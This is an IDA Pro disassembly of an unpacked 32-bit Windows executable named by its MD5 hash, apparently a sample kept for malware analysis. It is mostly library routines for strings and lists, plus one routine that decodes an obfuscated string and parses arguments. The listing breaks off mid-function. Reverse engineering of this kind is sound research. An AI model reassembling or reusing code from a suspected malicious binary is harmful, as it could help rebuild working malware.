;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 1C303637220ED56A36D992841F06CA2B
; File Name : u:\work\1c303637220ed56a36d992841f06ca2b_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001B5F7 ( 112119.)
; Section size in file : 0001B5F7 ( 112119.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401141+79�p
; sub_4011D3+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402F72
mov eax, [ebp+arg_0]
add esp, 10h
pop ebp
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40101C proc near ; CODE XREF: sub_4012AC+50�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402BA0
mov eax, [ebp+arg_0]
add esp, 10h
pop ebp
retn
sub_40101C endp
; =============== S U B R O U T I N E =======================================
sub_401038 proc near ; DATA XREF: .rdata:004219C4�o
mov dword ptr [ecx], offset off_41D314
jmp sub_402CCA
sub_401038 endp
; =============== S U B R O U T I N E =======================================
sub_401043 proc near ; DATA XREF: .rdata:off_41D314�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D314
call sub_402CCA
test [esp+4+arg_0], 1
jz short loc_40105F
push esi
call sub_402F6D
pop ecx
loc_40105F: ; CODE XREF: sub_401043+13�j
mov eax, esi
pop esi
retn 4
sub_401043 endp
; =============== S U B R O U T I N E =======================================
sub_401065 proc near ; CODE XREF: sub_40121E+43�p
; sub_4016BA+43�p ...
push 4
mov eax, offset loc_41C22C
call sub_4045CC
mov esi, ecx
mov [ebp-10h], esi
call sub_402BFB
and dword ptr [ebp-4], 0
push dword ptr [ebp+8]
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call sub_401111
mov eax, esi
call sub_40466B
retn 4
sub_401065 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40109A proc near ; CODE XREF: sub_4010C5+3�p
; sub_4010E1+6�j ...
push esi
mov esi, ecx
push 0
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call sub_4011D3
mov ecx, esi
pop esi
jmp sub_402CCA
sub_40109A endp
; =============== S U B R O U T I N E =======================================
sub_4010B7 proc near ; DATA XREF: .rdata:0041D324�o
; .rdata:0041D330�o ...
cmp dword ptr [ecx+24h], 10h
jb short loc_4010C1
mov eax, [ecx+10h]
retn
; ---------------------------------------------------------------------------
loc_4010C1: ; CODE XREF: sub_4010B7+4�j
lea eax, [ecx+10h]
retn
sub_4010B7 endp
; =============== S U B R O U T I N E =======================================
sub_4010C5 proc near ; DATA XREF: .rdata:off_41D320�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_40109A
test [esp+4+arg_0], 1
jz short loc_4010DB
push esi
call sub_402F6D
pop ecx
loc_4010DB: ; CODE XREF: sub_4010C5+D�j
mov eax, esi
pop esi
retn 4
sub_4010C5 endp
; =============== S U B R O U T I N E =======================================
sub_4010E1 proc near ; DATA XREF: .rdata:0042198C�o
mov dword ptr [ecx], offset off_41D32C
jmp sub_40109A
sub_4010E1 endp
; =============== S U B R O U T I N E =======================================
sub_4010EC proc near ; DATA XREF: .rdata:off_41D32C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D32C
call sub_40109A
test [esp+4+arg_0], 1
jz short loc_401108
push esi
call sub_402F6D
pop ecx
loc_401108: ; CODE XREF: sub_4010EC+13�j
mov eax, esi
pop esi
retn 4
sub_4010EC endp
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_401111 proc near ; CODE XREF: sub_401065+26�p
; sub_4013E6+2B�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_40131B
push 0FFFFFFFFh
push 0
push [esp+0Ch+arg_0]
mov ecx, esi
call sub_401141
mov eax, esi
pop esi
retn 4
sub_401111 endp
; ---------------------------------------------------------------------------
loc_401137: ; CODE XREF: .text:0041C1CE�j
; .text:0041C24A�j ...
push 0
push 1
call sub_4011D3
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401141 proc near ; CODE XREF: sub_401111+1B�p
; sub_401547+2B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp [edi+14h], eax
mov ebx, ecx
jnb short loc_401159
call sub_4026B9
loc_401159: ; CODE XREF: sub_401141+11�j
mov esi, [edi+14h]
mov eax, [ebp+arg_4]
sub esi, eax
cmp [ebp+arg_8], esi
jnb short loc_401169
mov esi, [ebp+arg_8]
loc_401169: ; CODE XREF: sub_401141+23�j
cmp ebx, edi
mov ecx, ebx
jnz short loc_401187
push 0FFFFFFFFh
add esi, eax
push esi
call sub_4012AC
push [ebp+arg_4]
mov ecx, ebx
push 0
call sub_4012AC
jmp short loc_4011CA
; ---------------------------------------------------------------------------
loc_401187: ; CODE XREF: sub_401141+2C�j
push 0
push esi
call sub_401337
test al, al
jz short loc_4011CA
cmp dword ptr [edi+18h], 10h
jb short loc_40119E
mov edi, [edi+4]
jmp short loc_4011A1
; ---------------------------------------------------------------------------
loc_40119E: ; CODE XREF: sub_401141+56�j
add edi, 4
loc_4011A1: ; CODE XREF: sub_401141+5B�j
mov ecx, [ebx+18h]
cmp ecx, 10h
jb short loc_4011AE
mov eax, [ebx+4]
jmp short loc_4011B1
; ---------------------------------------------------------------------------
loc_4011AE: ; CODE XREF: sub_401141+66�j
lea eax, [ebx+4]
loc_4011B1: ; CODE XREF: sub_401141+6B�j
mov edx, [ebp+arg_4]
push esi
add edi, edx
push edi
push ecx
push eax
call sub_401000
add esp, 10h
push esi
mov ecx, ebx
call sub_40131B
loc_4011CA: ; CODE XREF: sub_401141+44�j
; sub_401141+50�j
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn 0Ch
sub_401141 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4011D3 proc near ; CODE XREF: sub_40109A+10�p
; .text:0040113B�p ...
arg_0 = byte ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_401208
cmp dword ptr [esi+18h], 10h
jb short loc_401208
cmp [esp+4+arg_4], 0
lea eax, [esi+4]
push edi
mov edi, [eax]
jbe short loc_401200
push [esp+8+arg_4]
push edi
push 10h
push eax
call sub_401000
add esp, 10h
loc_401200: ; CODE XREF: sub_4011D3+1B�j
push edi
call sub_402F6D
pop ecx
pop edi
loc_401208: ; CODE XREF: sub_4011D3+8�j
; sub_4011D3+E�j
push [esp+4+arg_4]
mov ecx, esi
mov dword ptr [esi+18h], 0Fh
call sub_40131B
pop esi
retn 8
sub_4011D3 endp
; =============== S U B R O U T I N E =======================================
sub_40121E proc near ; CODE XREF: sub_41BB84+4A�p
push 44h
mov eax, offset loc_41C2BC
call sub_4045CC
push dword ptr [ebp+10h]
mov esi, [ebp+0Ch]
push dword ptr [esi+4]
push esi
call sub_401395
mov ecx, 0FC0FC0h
sub ecx, dword_433C44
cmp ecx, 1
jnb short loc_40127B
push offset aListTTooLong ; "list<T> too long"
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push offset dword_421988
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D32C
call sub_4041BB
loc_40127B: ; CODE XREF: sub_40121E+29�j
inc dword_433C44
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call sub_40466B
retn 0Ch
sub_40121E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401291 proc near ; CODE XREF: sub_41C370�p
push 10Ch
call sub_40304B
test eax, eax
pop ecx
jz short loc_4012A2
mov [eax], eax
loc_4012A2: ; CODE XREF: sub_401291+D�j
lea ecx, [eax+4]
test ecx, ecx
jz short locret_4012AB
mov [ecx], eax
locret_4012AB: ; CODE XREF: sub_401291+16�j
retn
sub_401291 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012AC proc near ; CODE XREF: sub_401141+33�p
; sub_401141+3F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ecx
cmp [esi+14h], edi
jnb short loc_4012C0
call sub_4026B9
loc_4012C0: ; CODE XREF: sub_4012AC+D�j
mov eax, [esi+14h]
sub eax, edi
cmp eax, [ebp+arg_4]
jnb short loc_4012CD
mov [ebp+arg_4], eax
loc_4012CD: ; CODE XREF: sub_4012AC+1C�j
cmp [ebp+arg_4], 0
jbe short loc_401313
mov ecx, [esi+18h]
cmp ecx, 10h
push ebx
lea edx, [esi+4]
jb short loc_4012E3
mov ebx, [edx]
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_4012E3: ; CODE XREF: sub_4012AC+31�j
mov ebx, edx
loc_4012E5: ; CODE XREF: sub_4012AC+35�j
cmp ecx, 10h
jb short loc_4012EC
mov edx, [edx]
loc_4012EC: ; CODE XREF: sub_4012AC+3C�j
sub eax, [ebp+arg_4]
add ebx, edi
add ebx, [ebp+arg_4]
push eax
push ebx
sub ecx, edi
push ecx
add edx, edi
push edx
call sub_40101C
mov eax, [esi+14h]
sub eax, [ebp+arg_4]
add esp, 10h
push eax
mov ecx, esi
call sub_40131B
pop ebx
loc_401313: ; CODE XREF: sub_4012AC+25�j
pop edi
mov eax, esi
pop esi
pop ebp
retn 8
sub_4012AC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40131B proc near ; CODE XREF: sub_401111+C�p
; sub_401141+84�p ...
arg_0 = dword ptr 4
cmp dword ptr [ecx+18h], 10h
mov eax, [esp+arg_0]
mov [ecx+14h], eax
jb short loc_40132D
mov ecx, [ecx+4]
jmp short loc_401330
; ---------------------------------------------------------------------------
loc_40132D: ; CODE XREF: sub_40131B+B�j
add ecx, 4
loc_401330: ; CODE XREF: sub_40131B+10�j
mov byte ptr [ecx+eax], 0
retn 4
sub_40131B endp
; =============== S U B R O U T I N E =======================================
sub_401337 proc near ; CODE XREF: sub_401141+49�p
; sub_401547+39�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
cmp edi, 0FFFFFFFEh
mov esi, ecx
jbe short loc_401349
call sub_40267A
loc_401349: ; CODE XREF: sub_401337+B�j
cmp [esi+18h], edi
jnb short loc_40135B
push dword ptr [esi+14h]
mov ecx, esi
push edi
call sub_401442
jmp short loc_401388
; ---------------------------------------------------------------------------
loc_40135B: ; CODE XREF: sub_401337+15�j
cmp [esp+8+arg_4], 0
jz short loc_40137C
cmp edi, 10h
jnb short loc_40137C
mov eax, [esi+14h]
cmp edi, eax
jnb short loc_401370
mov eax, edi
loc_401370: ; CODE XREF: sub_401337+35�j
push eax
push 1
mov ecx, esi
call sub_4011D3
jmp short loc_401388
; ---------------------------------------------------------------------------
loc_40137C: ; CODE XREF: sub_401337+29�j
; sub_401337+2E�j
test edi, edi
jnz short loc_401388
push edi
mov ecx, esi
call sub_40131B
loc_401388: ; CODE XREF: sub_401337+22�j
; sub_401337+43�j ...
xor eax, eax
cmp eax, edi
sbb eax, eax
pop edi
neg eax
pop esi
retn 8
sub_401337 endp
; =============== S U B R O U T I N E =======================================
sub_401395 proc near ; CODE XREF: sub_40121E+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 10Ch
call sub_40304B
test eax, eax
pop ecx
jz short loc_4013AA
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_4013AA: ; CODE XREF: sub_401395+D�j
lea ecx, [eax+4]
test ecx, ecx
jz short loc_4013B7
mov edx, [esp+arg_4]
mov [ecx], edx
loc_4013B7: ; CODE XREF: sub_401395+1A�j
push edi
lea edi, [eax+8]
test edi, edi
jz short loc_4013CA
push esi
mov esi, [esp+8+arg_8]
push 41h
pop ecx
rep movsd
pop esi
loc_4013CA: ; CODE XREF: sub_401395+28�j
pop edi
retn 0Ch
sub_401395 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_4013E6
mov dword ptr [esi], offset off_41D32C
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4013E6 proc near ; CODE XREF: .text:004013D5�p
; sub_4026B9+46�p
push 4
mov eax, offset loc_41C22C
call sub_4045CC
mov esi, ecx
mov [ebp-10h], esi
mov edi, [ebp+8]
push edi
call sub_402C72
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call sub_401111
mov eax, esi
call sub_40466B
retn 4
sub_4013E6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401420 proc near ; CODE XREF: sub_40121E+33�p
; sub_4016BA+33�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_40131B
push [esp+4+arg_0]
mov ecx, esi
call sub_401524
mov eax, esi
pop esi
retn 4
sub_401420 endp
; =============== S U B R O U T I N E =======================================
sub_401442 proc near ; CODE XREF: sub_401337+1D�p
push 0Ch
mov eax, offset sub_41C209
call sub_4045FF
mov edi, ecx
mov [ebp-18h], edi
mov esi, [ebp+8]
or esi, 0Fh
cmp esi, 0FFFFFFFEh
jbe short loc_401463
mov esi, [ebp+8]
jmp short loc_401488
; ---------------------------------------------------------------------------
loc_401463: ; CODE XREF: sub_401442+1A�j
xor edx, edx
push 3
mov eax, esi
pop ebx
div ebx
mov ecx, [edi+18h]
mov [ebp-14h], ecx
shr dword ptr [ebp-14h], 1
mov edx, [ebp-14h]
cmp eax, edx
jnb short loc_401488
push 0FFFFFFFEh
pop eax
sub eax, edx
cmp ecx, eax
ja short loc_401488
lea esi, [edx+ecx]
loc_401488: ; CODE XREF: sub_401442+1F�j
; sub_401442+38�j ...
and dword ptr [ebp-4], 0
lea eax, [esi+1]
push 0
push eax
call sub_4015ED
pop ecx
pop ecx
mov ebx, eax
jmp short loc_4014C7
; ---------------------------------------------------------------------------
loc_40149D: ; DATA XREF: .rdata:00421A8C�o
mov eax, [ebp+8]
mov [ebp-10h], esp
mov [ebp+8], eax
inc eax
push 0
push eax
mov byte ptr [ebp-4], 2
call sub_4015ED
pop ecx
mov [ebp-14h], eax
pop ecx
mov eax, offset loc_4014BE
retn
; ---------------------------------------------------------------------------
loc_4014BE: ; DATA XREF: sub_401442+76�o
mov edi, [ebp-18h]
mov esi, [ebp+8]
mov ebx, [ebp-14h]
loc_4014C7: ; CODE XREF: sub_401442+59�j
cmp dword ptr [ebp+0Ch], 0
jbe short loc_4014EC
cmp dword ptr [edi+18h], 10h
jb short loc_4014D8
mov eax, [edi+4]
jmp short loc_4014DB
; ---------------------------------------------------------------------------
loc_4014D8: ; CODE XREF: sub_401442+8F�j
lea eax, [edi+4]
loc_4014DB: ; CODE XREF: sub_401442+94�j
push dword ptr [ebp+0Ch]
push eax
lea eax, [esi+1]
push eax
push ebx
call sub_401000
add esp, 10h
loc_4014EC: ; CODE XREF: sub_401442+89�j
push 0
push 1
mov ecx, edi
call sub_4011D3
push dword ptr [ebp+0Ch]
mov ecx, edi
mov [edi+4], ebx
mov [edi+18h], esi
call sub_40131B
call sub_40466B
retn 8
sub_401442 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40150F proc near ; DATA XREF: .rdata:00421A7C�o
mov ecx, [ebp-18h]
xor esi, esi
push esi
push 1
call sub_4011D3
push esi
push esi
call sub_4041BB
int 3 ; Trap to Debugger
sub_40150F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401524 proc near ; CODE XREF: sub_401420+17�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
lea edx, [eax+1]
loc_40152E: ; CODE XREF: sub_401524+F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40152E
sub eax, edx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_401547
pop esi
retn 4
sub_401524 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401547 proc near ; CODE XREF: sub_401524+1A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
push edi
mov esi, ecx
call sub_4015B9
test al, al
jz short loc_401579
cmp dword ptr [esi+18h], 10h
jb short loc_401566
mov eax, [esi+4]
jmp short loc_401569
; ---------------------------------------------------------------------------
loc_401566: ; CODE XREF: sub_401547+18�j
lea eax, [esi+4]
loc_401569: ; CODE XREF: sub_401547+1D�j
push [ebp+arg_4]
sub edi, eax
push edi
push esi
mov ecx, esi
call sub_401141
jmp short loc_4015B3
; ---------------------------------------------------------------------------
loc_401579: ; CODE XREF: sub_401547+12�j
push 0
push [ebp+arg_4]
mov ecx, esi
call sub_401337
test al, al
jz short loc_4015B1
mov ecx, [esi+18h]
cmp ecx, 10h
jb short loc_401596
mov eax, [esi+4]
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401596: ; CODE XREF: sub_401547+48�j
lea eax, [esi+4]
loc_401599: ; CODE XREF: sub_401547+4D�j
push [ebp+arg_4]
push edi
push ecx
push eax
call sub_401000
add esp, 10h
push [ebp+arg_4]
mov ecx, esi
call sub_40131B
loc_4015B1: ; CODE XREF: sub_401547+40�j
mov eax, esi
loc_4015B3: ; CODE XREF: sub_401547+30�j
pop edi
pop esi
pop ebp
retn 8
sub_401547 endp
; =============== S U B R O U T I N E =======================================
sub_4015B9 proc near ; CODE XREF: sub_401547+B�p
arg_0 = dword ptr 4
push esi
mov esi, [ecx+18h]
cmp esi, 10h
lea eax, [ecx+4]
jb short loc_4015C9
mov edx, [eax]
jmp short loc_4015CB
; ---------------------------------------------------------------------------
loc_4015C9: ; CODE XREF: sub_4015B9+A�j
mov edx, eax
loc_4015CB: ; CODE XREF: sub_4015B9+E�j
cmp [esp+4+arg_0], edx
jb short loc_4015E7
cmp esi, 10h
jb short loc_4015D8
mov eax, [eax]
loc_4015D8: ; CODE XREF: sub_4015B9+1B�j
mov ecx, [ecx+14h]
add ecx, eax
cmp ecx, [esp+4+arg_0]
jbe short loc_4015E7
mov al, 1
jmp short loc_4015E9
; ---------------------------------------------------------------------------
loc_4015E7: ; CODE XREF: sub_4015B9+16�j
; sub_4015B9+28�j
xor al, al
loc_4015E9: ; CODE XREF: sub_4015B9+2C�j
pop esi
retn 4
sub_4015B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015ED proc near ; CODE XREF: sub_401442+50�p
; sub_401442+6C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
sub esp, 0Ch
test ecx, ecx
ja short loc_401605
xor ecx, ecx
loc_4015FC: ; CODE XREF: sub_4015ED+22�j
push ecx
call sub_40304B
pop ecx
leave
retn
; ---------------------------------------------------------------------------
loc_401605: ; CODE XREF: sub_4015ED+B�j
or eax, 0FFFFFFFFh
xor edx, edx
div ecx
cmp eax, 1
jnb short loc_4015FC
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
call sub_402C0C
push offset dword_4219C0
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], offset off_41D314
call sub_4041BB
int 3 ; Trap to Debugger
push esi
push [esp+10h+var_8]
mov esi, ecx
call sub_402C72
mov dword ptr [esi], offset off_41D314
mov eax, esi
pop esi
retn 4
sub_4015ED endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40164F proc near ; CODE XREF: sub_40243A+47�p
; sub_40243A:loc_4024A3�p ...
cmp dword ptr [esi], 0
jnz short loc_401659
call sub_402F5D
loc_401659: ; CODE XREF: sub_40164F+3�j
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_401668
call sub_402F5D
loc_401668: ; CODE XREF: sub_40164F+12�j
mov eax, [esi+4]
add eax, 8
retn
sub_40164F endp
; =============== S U B R O U T I N E =======================================
sub_40166F proc near ; CODE XREF: sub_40243A+39�p
; sub_413F8F+2F�p ...
mov eax, [esi]
test eax, eax
jz short loc_401679
cmp eax, [edi]
jz short loc_40167E
loc_401679: ; CODE XREF: sub_40166F+4�j
call sub_402F5D
loc_40167E: ; CODE XREF: sub_40166F+8�j
mov eax, [esi+4]
xor ecx, ecx
cmp eax, [edi+4]
setnz cl
mov al, cl
retn
sub_40166F endp
; =============== S U B R O U T I N E =======================================
sub_40168C proc near ; CODE XREF: sub_40243A+62�p
; sub_413F8F+47�p ...
cmp dword ptr [esi], 0
mov eax, [esi]
mov [edi], eax
mov eax, [esi+4]
mov [edi+4], eax
jnz short loc_4016A0
call sub_402F5D
loc_4016A0: ; CODE XREF: sub_40168C+D�j
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_4016AF
call sub_402F5D
loc_4016AF: ; CODE XREF: sub_40168C+1C�j
mov eax, [esi+4]
mov eax, [eax]
mov [esi+4], eax
mov eax, edi
retn
sub_40168C endp
; =============== S U B R O U T I N E =======================================
sub_4016BA proc near ; CODE XREF: sub_4140AB+54�p
push 48h
mov eax, offset loc_41C24F
call sub_4045CC
push dword ptr [ebp+8]
mov esi, [ebp+10h]
push dword ptr [esi+4]
push esi
call sub_401745
mov ecx, 3C3C3C3h
sub ecx, dword_433C50
cmp ecx, 1
jnb short loc_401717
push offset aListTTooLong ; "list<T> too long"
lea ecx, [ebp-2Ch]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-54h]
call sub_401065
push offset dword_421988
lea eax, [ebp-54h]
push eax
mov dword ptr [ebp-54h], offset off_41D32C
call sub_4041BB
loc_401717: ; CODE XREF: sub_4016BA+29�j
inc dword_433C50
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call sub_40466B
retn 0Ch
sub_4016BA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40172D proc near ; CODE XREF: sub_41C370:loc_41C38D�p
push 4Ch
call sub_40304B
test eax, eax
pop ecx
jz short loc_40173B
mov [eax], eax
loc_40173B: ; CODE XREF: sub_40172D+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short locret_401744
mov [ecx], eax
locret_401744: ; CODE XREF: sub_40172D+13�j
retn
sub_40172D endp
; =============== S U B R O U T I N E =======================================
sub_401745 proc near ; CODE XREF: sub_4016BA+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 4Ch
call sub_40304B
test eax, eax
pop ecx
jz short loc_401757
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_401757: ; CODE XREF: sub_401745+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short loc_401764
mov edx, [esp+arg_4]
mov [ecx], edx
loc_401764: ; CODE XREF: sub_401745+17�j
push edi
lea edi, [eax+8]
test edi, edi
jz short loc_401777
push esi
mov esi, [esp+8+arg_8]
push 11h
pop ecx
rep movsd
pop esi
loc_401777: ; CODE XREF: sub_401745+25�j
pop edi
retn 0Ch
sub_401745 endp
; =============== S U B R O U T I N E =======================================
sub_40177B proc near ; DATA XREF: .rdata:off_420AE4�o
push 4B8h
mov eax, offset loc_41C348
call sub_404635
cmp dword ptr [ebp+1Ch], 3
mov eax, [ebp+10h]
mov edi, [ebp+20h]
mov [ebp-4C4h], eax
mov eax, [ebp+18h]
mov [ebp-4BCh], eax
mov [ebp-4C0h], edi
jl loc_4019D5
mov esi, 0BFh
xor ebx, ebx
push esi
lea eax, [ebp-18Fh]
push ebx
push eax
mov [ebp-190h], bl
call sub_407B70
push esi
lea eax, [ebp-0CFh]
push ebx
push eax
mov [ebp-0D0h], bl
call sub_407B70
push dword ptr [edi+4]
lea edi, [ebp-190h]
call sub_41B7F9
push 0C0h
lea esi, [ebp-0D0h]
mov ebx, offset aGdbdADjmGjZJJN ; "У¤¡¤ÓÑ ×ÐÓ¤¦¬Ñ£¦Ó§Ô¦Ð¦ÐÑÑÐÑÖÐÑ ÐѦ§£"...
call sub_4196D1
add esp, 20h
cmp byte ptr [ebp+8], 0
jz short loc_401817
cmp byte_425222, 0
jz loc_4019EB
loc_401817: ; CODE XREF: sub_40177B+8D�j
lea ecx, [ebp-0D0h]
lea eax, [ebp-190h]
loc_401823: ; CODE XREF: sub_40177B+C0�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_401841
test dl, dl
jz short loc_40183D
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_401841
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_401823
loc_40183D: ; CODE XREF: sub_40177B+B0�j
xor eax, eax
jmp short loc_401846
; ---------------------------------------------------------------------------
loc_401841: ; CODE XREF: sub_40177B+AC�j
; sub_40177B+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401846: ; CODE XREF: sub_40177B+C4�j
test eax, eax
jnz loc_4019C8
push 327h
push eax
lea eax, [ebp-4B8h]
push eax
call sub_407B70
push dword ptr [ebp-4BCh]
mov esi, offset dword_420A78
push esi
mov edi, 0FFh
lea eax, [ebp-4B8h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-4B8h]
add esp, 1Ch
lea ecx, [eax+1]
loc_40188A: ; CODE XREF: sub_40177B+114�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40188A
push dword ptr [ebp-4C4h]
sub eax, ecx
push esi
mov [ebp+eax-4B8h], dl
lea eax, [ebp-3B8h]
push 22h
push eax
call sub_402AEE
lea eax, [ebp-3B8h]
add esp, 10h
lea ecx, [eax+1]
loc_4018BB: ; CODE XREF: sub_40177B+145�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4018BB
mov ebx, [ebp-4C0h]
push dword ptr [ebx+8]
sub eax, ecx
push esi
mov [ebp+eax-3B8h], dl
lea eax, [ebp-395h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-395h]
add esp, 10h
lea ecx, [eax+1]
loc_4018EE: ; CODE XREF: sub_40177B+178�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4018EE
push dword ptr [ebx+0Ch]
sub eax, ecx
push esi
mov [ebp+eax-395h], dl
lea eax, [ebp-295h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-295h]
add esp, 10h
lea esi, [eax+1]
loc_40191B: ; CODE XREF: sub_40177B+1A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40191B
sub eax, esi
mov [ebp+eax-295h], cl
mov al, [ebp+8]
mov [ebp-192h], al
mov al, [ebp+0Ch]
push 4
mov [ebp-193h], al
pop eax
cmp [ebp+1Ch], eax
jl short loc_40198B
mov [ebp-4BCh], eax
loc_40194B: ; CODE XREF: sub_40177B+203�j
mov eax, [ebx+eax*4]
push 3
mov edi, offset dword_420A7C
mov esi, eax
pop ecx
xor edx, edx
repe cmpsb
jz short loc_401982
mov esi, eax
push 2
mov edi, offset dword_420A80
pop ecx
xor eax, eax
repe cmpsb
jz short loc_401982
mov eax, [ebp-4BCh]
inc eax
cmp eax, [ebp+1Ch]
mov [ebp-4BCh], eax
jle short loc_40194B
jmp short loc_401992
; ---------------------------------------------------------------------------
loc_401982: ; CODE XREF: sub_40177B+1E1�j
; sub_40177B+1F1�j
mov byte ptr [ebp-195h], 1
jmp short loc_401992
; ---------------------------------------------------------------------------
loc_40198B: ; CODE XREF: sub_40177B+1C8�j
mov byte ptr [ebp-195h], 0
loc_401992: ; CODE XREF: sub_40177B+205�j
; sub_40177B+20E�j
push 8
mov byte ptr [ebp-194h], 0
call sub_40304B
pop ecx
mov [ebp-4C0h], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_4019EB
push offset sub_41B925
lea ecx, [ebp-4B8h]
mov edi, offset dword_420A84
mov esi, eax
call sub_4140AB
jmp short loc_4019EB
; ---------------------------------------------------------------------------
loc_4019C8: ; CODE XREF: sub_40177B+CD�j
